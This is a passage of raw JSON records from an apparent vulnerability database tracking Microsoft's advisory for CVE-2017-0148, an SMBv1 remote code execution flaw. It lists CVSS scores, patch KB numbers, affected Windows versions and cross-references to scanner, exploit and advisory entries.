"PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-26T00:46:05", "rev": 2}, "score": {"value": 7.3, 
"vector": "NONE", "modified": "2021-09-26T00:46:05", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KBMS16-110, 3187754", "KB3210720", "KB4012217", "KB3177186", "KB3213986", "KB4012216", "KB3205409", "KB4012213", "KB4012214", "KB3205401", "KB4012212", "KB4012606", "KB4012598", "KB3210721", "KB4012215", "KB3212646", "KB4013198"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for 
x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems 
Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-26T00:46:05", "differentElements": ["msAffectedSoftware"], "edition": 77}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-28T08:53:53", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": 
["RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-28T08:53:53", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-28T08:53:53", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3210720", "KBMS16-110, 3187754", "KB4012215", "KB4012212", "KB4012216", "KB3212646", "KB3205409", 
"KB3213986", "KB3177186", "KB4012598", "KB4012217", "KB4012606", "KB3210721", "KB4012214", "KB4013198", "KB4012213", "KB3205401", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 
(Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": 
""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-28T08:53:53", "differentElements": ["msAffectedSoftware"], "edition": 78}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", 
"title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-28T22:45:57", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": 
"symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-28T08:53:53", "rev": 2}, "score": {"value": 7.3, 
"vector": "NONE", "modified": "2021-09-28T08:53:53", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KB4012216", "KB3210721", "KB4012598", "KB4013198", "KB4012217", "KB3210720", "KB4012606", "KB3212646", "KB3205401", "KB4012214", "KB4012215", "KB4012212", "KB4012213", "KB3205409", "KBMS16-110, 3187754", "KB3213986", "KB3177186"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for 
x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems 
